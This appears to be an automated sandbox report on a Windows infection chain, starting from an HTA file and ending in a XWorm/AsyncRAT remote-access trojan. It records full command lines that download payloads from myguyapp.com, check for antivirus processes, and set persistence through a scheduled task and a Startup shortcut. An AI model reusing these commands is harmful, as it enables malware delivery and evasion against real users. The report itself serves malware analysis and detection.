2024-12-11 17:03:14 UTC	16384	IN	Data Raw: 37 49 78 13 37 5e b4 97 60 2a e6 0d b2 bc 19 67 ec 3b 9a 45 a7 cc 50 dd ac 3d cd 84 e9 05 95 5d 2e 3c 66 6f 26 74 9f 5f e6 43 1a f7 23 70 b6 bd 31 c0 63 c9 0d 3f 5f c9 49 6f e7 fb 36 b9 30 bf 52 fd 63 65 c3 c9 4c 07 da a0 07 70 6c 9c 10 96 81 c9 86 58 bb 8e 6a 0d 54 f3 1e 6c 48 61 77 97 72 cf a1 57 cb df 5e 5a 05 5d 04 66 6c a1 3c 3b 68 a8 99 88 0a 4a c9 65 38 95 2b d7 82 1c ee 96 eb f6 c2 b8 53 4b 76 71 23 1c 2e 7f a6 10 31 ac b9 00 1d b7 33 a4 fc dd d5 4e 7e e9 e1 cd 46 52 d4 25 c4 8c 7f 06 93 ca ee 14 8c 8c 9b 69 d8 27 91 4f e0 46 c5 05 04 aa ab 17 37 00 dd c6 a4 66 6e d1 56 36 90 14 75 76 b5 0b b3 a2 a4 29 30 94 08 43 60 53 c4 c4 db 52 2f 14 c9 60 11 ae 5a ce 2c ec 33 cc fd e7 10 de 0a 19 46 bd 02 b1 9c f9 f2 45 97 8a 9d 48 57 48 21 64 44 53 0c c2 c2 Data Ascii: 7Ix7^`*g;EP=].<fo&t_C#p1c?_Io60RceLplXjTlHawrW^Z]fl<;hJe8+SKvq#.13N~FR%i'OF7fnV6uv)0C`SR/`Z,3FEHWH!dDS
2024-12-11 17:03:14 UTC	16384	IN	Data Raw: 8e c6 84 cc 36 53 d4 04 f9 57 bb cf dc ae 21 91 54 31 d2 b4 f8 b0 99 26 e7 00 e5 1d ee 47 32 48 4f 22 f1 fd 0e 26 ca 1c 35 53 bc 5a ba 4b 23 61 90 cd ec 16 74 77 9b 62 30 30 da f1 2a 0a d8 92 a2 27 f4 bd cc ee ed 9b 74 f5 54 82 a2 d1 79 26 a2 0b 05 91 0d a8 fb 22 01 6a 8a 78 92 72 82 e0 dc a8 f3 fc d5 0a 40 d6 a9 7e fe 0c c3 d8 ac 8a 35 d6 cf 36 f8 56 e8 8c 34 8c 0b e3 a5 e7 26 fe fc af 1b 5c d7 95 5e 4f 41 7c 6c b1 fe db 60 47 fb 4e 8f fe fb 7d 6c 90 c5 c5 32 f5 f5 78 7e da d0 7e 80 d4 ad 27 b1 d4 53 a7 29 34 ad 46 42 cc af 15 28 9d c2 d0 7e 2e be d9 fb 32 de 6f 28 92 22 70 41 26 b5 a8 36 5f f7 a8 e6 cb 84 ac 31 2b 55 13 8e fc 05 ad 53 a2 18 08 be a3 3a 34 87 94 12 12 1a fb ea ed 74 ad a6 19 2d fa ae 0c 33 50 1c 04 51 1e 18 11 b2 94 05 49 1e 9b 81 6d 95 Data Ascii: 6SW!T1&G2HO"&5SZK#atwb00*'tTy&"jxr@~56V4&\^OA\|l`GN}l2x~~'S)4FB(~.2o("pA&6_1+US:4t-3PQIm

Target ID:	0
Start time:	12:03:00
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\c2.hta"
Imagebase:	0x820000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	12:03:03
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\temp.js"
Imagebase:	0x600000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:03:04
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:03:04
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:03:04
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'"
Imagebase:	0xf0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:03:07
Start date:	11/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf"
Imagebase:	0x7ff6bc1b0000
File size:	5'641'176 bytes
MD5 hash:	24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	12:03:07
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c powershell -Command "Invoke-WebRequest -Uri 'http://myguyapp.com/msword.zip' -OutFile 'C:\Users\user\AppData\Local\Temp\msword.zip'"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:03:07
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:03:07
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -Command "Invoke-WebRequest -Uri 'http://myguyapp.com/msword.zip' -OutFile 'C:\Users\user\AppData\Local\Temp\msword.zip'"
Imagebase:	0xf0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:03:08
Start date:	11/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase:	0x7ff74bb60000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	12:03:08
Start date:	11/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:03:08
Start date:	11/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1664,i,11365846873852603877,16222139913176040509,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase:	0x7ff74bb60000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	12:03:21
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c mkdir "C:\Users\user\AppData\Local\Temp\msword"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	12:03:21
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:03:21
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c powershell -Command "Expand-Archive -Path 'C:\Users\user\AppData\Local\Temp\msword.zip' -DestinationPath 'C:\Users\user\AppData\Local\Temp\msword' -Force"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	12:03:21
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	12:03:22
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -Command "Expand-Archive -Path 'C:\Users\user\AppData\Local\Temp\msword.zip' -DestinationPath 'C:\Users\user\AppData\Local\Temp\msword' -Force"
Imagebase:	0xf0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	12:03:49
Start date:	11/12/2024
Path:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\msword\msword.exe"
Imagebase:	0x400000
File size:	891'289'591 bytes
MD5 hash:	C744E054E4EF01832BBF43B81D397B61
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 8%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	12:03:50
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	12:03:50
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	12:03:50
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xa20000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	12:03:50
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa opssvc"
Imagebase:	0xe00000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	12:03:51
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xa20000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	12:03:51
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Imagebase:	0xe00000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	12:03:51
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 220239
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	12:03:51
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "DimPieLilHot" Statistical
Imagebase:	0xe00000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	12:03:51
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	12:03:51
Start date:	11/12/2024
Path:	C:\Users\user\AppData\Local\Temp\220239\Carter.pif
Wow64 process (32bit):	true
Commandline:	Carter.pif F
Imagebase:	0xbf0000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000020.00000003.3491947145.000000000184B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000020.00000003.3491947145.000000000184B000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000020.00000003.3546191644.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000020.00000003.3546191644.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000020.00000003.3546191644.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000020.00000003.3546191644.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000020.00000003.3546191644.0000000003DFE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000020.00000003.3546191644.0000000003DFE000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000020.00000003.3546333240.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000020.00000003.3546333240.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000020.00000003.3546306644.0000000003E43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000020.00000003.3546306644.0000000003E43000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000020.00000003.3546191644.0000000003E0E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000020.00000003.3546191644.0000000003E0E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 8%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	12:03:52
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0x7d0000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	12:03:52
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	12:03:53
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	12:03:53
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
Imagebase:	0xf20000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	12:03:53
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & echo URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	12:03:53
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	12:03:54
Start date:	11/12/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
Imagebase:	0x7ff758540000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	12:03:54
Start date:	11/12/2024
Path:	C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
Imagebase:	0xf50000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 8%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	12:04:03
Start date:	11/12/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
Imagebase:	0x7ff758540000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	12:04:03
Start date:	11/12/2024
Path:	C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
Imagebase:	0xec0000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	12:06:00
Start date:	11/12/2024
Path:	C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
Imagebase:	0x900000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000002C.00000002.4143164182.00000000009E2000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000002C.00000002.4143164182.00000000009E2000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000002C.00000002.4145311596.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Function 06080FB7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4148270832.0000000006080000.00000010.00000800.00020000.00000000.sdmp, Offset: 06080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6080000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbaa41dc49d8cfb90fae6181bf62a1c8c8a9cc53683907e8189441df7059a680
Instruction ID: 6e538ee3c08ec2169f1437a2dc5bcd7629ee3b77b9c0aed4d59985b8cfe26bc1
Opcode Fuzzy Hash: dbaa41dc49d8cfb90fae6181bf62a1c8c8a9cc53683907e8189441df7059a680
Instruction Fuzzy Hash:

Function 06080FE7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4148270832.0000000006080000.00000010.00000800.00020000.00000000.sdmp, Offset: 06080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6080000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbaa41dc49d8cfb90fae6181bf62a1c8c8a9cc53683907e8189441df7059a680
Instruction ID: 6e538ee3c08ec2169f1437a2dc5bcd7629ee3b77b9c0aed4d59985b8cfe26bc1
Opcode Fuzzy Hash: dbaa41dc49d8cfb90fae6181bf62a1c8c8a9cc53683907e8189441df7059a680
Instruction Fuzzy Hash:

Analysis Process: msword.exePID: 8880, Parent PID: 7380COMMON

Execution Graph

Execution Coverage:	17.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.7%
Total number of Nodes:	1526
Total number of Limit Nodes:	33

Executed Functions

Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040512F
GetDlgItem.USER32(?,000003EE), ref: 0040513E
GetClientRect.USER32(?,?), ref: 00405196
GetSystemMetrics.USER32(00000015), ref: 0040519E
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
ShowWindow.USER32(?,00000008), ref: 0040523A
GetDlgItem.USER32(?,000003EC), ref: 0040525B
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
GetDlgItem.USER32(?,000003F8), ref: 0040514D

Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

GetDlgItem.USER32(?,000003EC), ref: 004052AB
CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
CloseHandle.KERNELBASE(00000000), ref: 004052C0
ShowWindow.USER32(00000000), ref: 004052E7
ShowWindow.USER32(?,00000008), ref: 004052EC
ShowWindow.USER32(00000008), ref: 00405333
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
CreatePopupMenu.USER32 ref: 00405376
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
GetWindowRect.USER32(?,?), ref: 0040539E
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
OpenClipboard.USER32(00000000), ref: 0040540B
